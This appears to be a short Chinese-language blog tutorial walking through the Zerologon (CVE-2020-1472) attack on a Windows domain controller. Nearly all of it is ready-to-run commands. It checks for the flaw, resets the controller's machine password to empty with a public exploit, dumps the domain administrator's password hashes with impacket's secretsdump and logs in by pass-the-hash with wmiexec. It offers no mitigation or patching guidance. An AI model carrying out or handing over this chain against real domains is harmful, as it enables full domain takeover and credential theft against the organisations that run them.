前言
利用SecuraBV/CVE-2020-1472检测域控是否存在CVE-2020-1472漏洞
利用dirkjanm/CVE-2020-1472将域控密码置为空
利用fortra/impacket通过空密码远程连接域控,导出导出域控管理员用户密码哈希值,以用户名和哈希值登录,实现Windows域控提权
检测域控是否存在CVE-2020-1472漏洞
下载项目
1 2
| git clone https://github.com/SecuraBV/CVE-2020-1472.git cd CVE-2020-1472
|
下载依赖
1 2 3
| python3 -m venv venv source venv/bin/activate pip3 install -r requirements.txt
|
poc
1
| python3 zerologon_tester.py <domain_name> <domain_controller_ip_or_hostname>
|
将域控密码置为空
下载项目
1 2
| git clone https://github.com/dirkjanm/CVE-2020-1472.git cd CVE-2020-1472
|
exp
1
| python3 cve-2020-1472-exploit.py <domain_name> <domain_controller_ip_or_hostname>
|
远程连接域控
下载项目
1 2
| git clone https://github.com/fortra/impacket.git cd impacket/examples
|
导出域控管理员用户密码哈希值
-no-pass:通过空密码认证
-just-dc:针对域控
1
| python3 secretsdump.py <domain_name>/<domain_admin_username>@<domain_controller_ip_or_hostname> -no-pass
|
以用户名和哈希值登录
<domain_admin_username>:域管理员用户名
Administrator
<domain_admin_password_hash>:上一步骤获取的密码哈希值
1
| python3 wmiexec.py <domain_name>/<domain_admin_username>@<domain_controller_ip_or_hostname> -hashes :<domain_admin_password_hash>
|
完成